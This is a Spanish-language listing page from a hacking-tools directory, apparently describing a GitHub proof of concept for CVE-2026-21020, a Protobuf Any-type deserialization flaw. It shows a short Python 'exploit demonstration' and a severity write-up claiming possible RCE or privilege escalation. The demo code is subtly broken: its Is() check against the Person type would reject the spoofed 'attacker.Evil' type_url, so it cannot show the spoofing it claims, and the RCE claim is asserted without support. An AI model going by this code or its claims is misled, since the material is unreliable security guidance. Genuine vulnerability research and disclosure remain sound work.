Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-21020-Protobuf-Message-Parsing-Polymorphic-Deserialization-Vulnerability — PoC para CVE-2026-21020, que demuestra la deserialización polimórfica de tipo Any de Protobuf, donde el type_url controlado por el atacante puede provocar errores de lógica, RCE o escalada de privilegios. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-21020-protobuf-message-parsing-polymorphic-deserialization-vulnerability
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de APIs
GitHubgeorge0papasotiriou/cve-2026-21020-protobuf-message-parsing-polymorphic-deserialization-vulnerability

CVE-2026-21020-Protobuf-Message-Parsing-Polymorphic-Deserialization-Vulnerability

PoC para CVE-2026-21020, que demuestra la deserialización polimórfica de tipo Any de Protobuf, donde el type_url controlado por el atacante puede provocar errores de lógica, RCE o escalada de privilegios.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 16 díasAún no revisado

CVE-2026-21020 – Vulnerabilidad de deserialización polimórfica en el análisis de mensajes Protobuf

Código del programa (Python con protobuf)

root@kitploit:~
# proto_vuln.py - Insecure handling of Any type
import addressbook_pb2  # Example protobuf

# Simulated deserialization that trusts an injected type_url
from google.protobuf import any_pb2

any_msg = any_pb2.Any()
any_msg.type_url = "type.googleapis.com/attacker.Evil"
any_msg.value = b'\x0a\x05admin'  # serialized payload

# Application unpacks to expected type but could instantiate arbitrary class if using dynamic loading
if any_msg.Is(addressbook_pb2.Person.DESCRIPTOR):
    person = addressbook_pb2.Person()
    any_msg.Unpack(person)
    print("Person unpacked, but type_url was spoofed!")

CVE-2026-21020 – Deserialización polimórfica de Protobuf mediante Any

Severity: Critical

Resumen

Un servicio utiliza el tipo Any de Protocol Buffers para encapsular mensajes y los desempaqueta dinámicamente usando el campo type_url sin validar el tipo esperado. Un atacante puede enviar un mensaje con un type_url manipulado que apunte a una clase de mensaje peligrosa (o no intencionada), provocando errores de lógica o ejecución de código.

Detalles de la vulnerabilidad

  • Tipo: Deserialización de datos no confiables / Confusión de tipos
  • Impacto: Posible RCE o escalada de privilegios.
  • Causa raíz: El servidor deserializa la carga útil basándose en el type_url controlado por el atacante sin una lista blanca.

Demostración del exploit

Ejecute la simulación:

root@kitploit:~
pip install protobuf
python proto_vuln.py

Esto demuestra que el tipo Any puede ser suplantado; si el código carga dinámicamente la clase desde type_url, podría conducir a RCE.

Descargar herramienta